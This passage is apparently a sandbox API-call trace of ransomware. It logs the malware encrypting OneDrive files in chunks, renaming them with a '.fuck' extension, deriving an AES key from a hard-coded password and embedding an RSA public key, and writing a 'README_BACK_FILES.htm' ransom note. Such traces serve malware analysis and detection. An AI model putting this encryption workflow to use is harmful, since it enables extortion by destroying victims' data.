hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.793] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.795] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.795] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.808] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.809] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.809] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.810] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.811] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.811] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.857] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.857] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.858] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x48, lpOverlapped=0x0) returned 1 [0278.858] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x48, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x50) returned 1 [0278.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0278.858] CloseHandle (hObject=0x5d48) returned 1 [0278.858] CloseHandle (hObject=0x5d3c) returned 1 [0278.858] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0278.863] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0278.869] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0278.874] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0278.876] CryptDestroyHash (hHash=0x2fa748) returned 1 [0278.876] CryptDestroyKey (hKey=0x2fb688) returned 1 [0278.876] CryptReleaseContext (hProv=0x2f2d1c0, dwFlags=0x0) returned 1 [0278.876] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0278.876] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0278.876] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\readme_back_files.htm")) returned 0xffffffff [0278.876] AreFileApisANSI () returned 1 [0278.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0278.877] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0278.878] GetFileType (hFile=0x5d4c) returned 0x1 [0278.878] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0278.882] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0278.882] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0278.882] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.882] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.882] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0278.882] GetLastError () returned 0x0 [0278.883] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui")) returned 0x20 [0278.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0278.883] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0278.884] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0278.885] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0278.886] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d820) returned 1 [0278.918] CryptCreateHash (in: hProv=0x2f2d820, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0278.918] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0278.918] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0278.918] CryptDeriveKey (in: hProv=0x2f2d820, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0278.918] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0278.918] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0278.918] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d930) returned 1 [0278.919] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d930, dwCertEncodingType=0x1, pInfo=0x2f366d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36700*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36708*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc008) returned 1 [0278.919] CryptEncrypt (in: hKey=0x2fc008, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0278.919] CryptEncrypt (in: hKey=0x2fc008, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d688*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d688*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0278.919] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2d688*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 